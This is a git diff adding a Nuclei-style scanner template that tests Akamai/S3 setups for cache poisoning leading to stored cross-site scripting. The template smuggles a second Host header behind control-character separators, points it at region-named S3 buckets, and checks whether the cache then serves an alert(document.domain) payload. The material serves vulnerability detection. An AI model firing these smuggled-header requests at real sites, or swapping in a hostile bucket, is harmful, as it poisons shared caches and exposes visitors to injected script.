diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai/akamai-arl-xss.yaml similarity index 100% rename from misconfiguration/akamai-arl-xss.yaml rename to misconfiguration/akamai/akamai-arl-xss.yaml diff --git a/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml new file mode 100644 index 0000000000..7de4ada050 --- /dev/null +++ b/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -0,0 +1,64 @@ +id: akamai-s3-cache-poisoning + +info: + name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting + author: DhiyaneshDk + severity: high + reference: + - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ + - https://owasp.org/www-community/attacks/Cache_Poisoning + metadata: + verified: "true" + tags: cache,poisoning,generic,xss,akamai,s3 + +variables: + rand: "{{rand_base(5)}}" + +requests: + - raw: + - |+ + GET /nuclei.svg?{{rand}}=x HTTP/1.1 + Host: {{Hostname}} + {{escape}}Host: {{bucket}} + + - |+ + GET /nuclei.svg?{{rand}}=x HTTP/1.1 + Host: {{Hostname}} + + attack: clusterbomb + payloads: + escape: + - "\x0b" + - "\x0c" + - "\x1c" + - "\x1d" + - "\x1e" + - "\x1f" + + bucket: + - "nuclei-ap-northeast-1" + - "nuclei-ap-northeast-2" + - "nuclei-ap-northeast-3" + - "nuclei-ap-south-1" + - "nuclei-ap-southeast-1" + - "nuclei-ap-southeast-2" + - "nuclei-ca-central-1" + - "nuclei-eu-central-1" + - "nuclei-eu-north-1" + - "nuclei-eu-west-1" + - "nuclei-eu-west-2" + - "nuclei-eu-west-3" + - "nuclei-sa-east-1" + - "nuclei-us-east-1" + - "nuclei-us-east-2" + - "nuclei-us-west-1" + - "nuclei-us-west-2" + + stop-at-first-match: true + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "alert(document.domain)")' + - 'status_code_2 == 200' + condition: and